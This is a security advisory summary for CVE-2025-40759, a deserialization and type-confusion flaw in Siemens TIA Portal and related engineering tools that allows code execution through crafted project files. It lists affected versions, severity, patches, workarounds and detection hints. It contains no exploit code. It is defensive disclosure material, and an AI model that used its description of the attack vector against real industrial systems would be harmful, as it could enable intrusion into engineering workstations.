Full Report
Affected products do not properly sanitize user-controllable input when parsing project files. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet available.
Analysis Summary
# Vulnerability: Deserialization and Type Confusion in Siemens Engineering Platforms
## CVE Details
- **CVE ID:** CVE-2025-40759
- **CVSS Score:**
- CVSS v4.0: **8.5 (High)**
- CVSS v3.1: **7.8 (High)**
- **CWE:** CWE-502 (Deserialization of Untrusted Data)
## Affected Systems
- **SIMATIC STEP 7 / WinCC:** Versions < V17 Update 9
- **SIMATIC S7-PLCSIM V17:** All versions
- **SIMOCODE ES V17:** All versions
- **SIMOTION SCOUT TIA V5.4:** All versions
- **SINAMICS Startdrive V17:** All versions
- **SIRIUS Safety ES V17 / Soft Starter ES V17:** All versions
- **TIA Portal Cloud V17:** All versions
- **TIA Portal V18:** All versions (as of the current advisory status)
## Vulnerability Description
Affected Siemens engineering platforms fail to properly sanitize stored security properties and user-controllable input when parsing project files. Specifically, during the deserialization of untrusted data within a project file, an attacker can trigger a type confusion flaw. This memory corruption or logic error allows for the execution of arbitrary code within the context of the affected application.
## Exploitation
- **Status:** Not currently reported as exploited in the wild; no public PoC mentioned.
- **Complexity:** Low (Successful exploitation relies on the flaw in the parsing logic).
- **Attack Vector:** Local (Requires a user to open a specially crafted malicious project file; User Interaction is Required).
## Impact
- **Confidentiality:** High
- **Integrity:** High
- **Availability:** High
## Remediation
### Patches
Siemens recommends updating to the following versions where fixes are available:
- **SIMATIC STEP 7 V17 / WinCC V17:** Update to V17 Update 9 or later.
- **TIA Portal V20:** (Referenced in history as having a fix available).
### Workarounds
For products where no fix is currently planned or available (e.g., S7-PLCSIM V17, SIMOCODE ES V17):
- **Restrict File Sources:** Only open project files from trusted and known sources.
- **Principle of Least Privilege:** Ensure the application is run with the minimum necessary user privileges to limit the impact of code execution.
- **External Media Controls:** Apply strict policies for transferring project files via USB or network shares.
## Detection
- **Indicators of Compromise:** Unusual application crashes when opening specific project files; unauthorized outbound network connections from the engineering workstation following project imports.
- **Detection Methods:** Use endpoint detection and response (EDR) tools to monitor for suspicious child processes spawned by TIA Portal or associated engineering software.
## References
- **Vendor Advisory:** hxxps://cert-portal[.]siemens[.]com/productcert/html/ssa-493396[.]html
- **Siemens ProductCERT:** hxxps://www[.]siemens[.]com/cert/advisories
- **Patch Download (V17 Update 9):** hxxps://support[.]industry[.]siemens[.]com/cs/ww/en/view/109784441/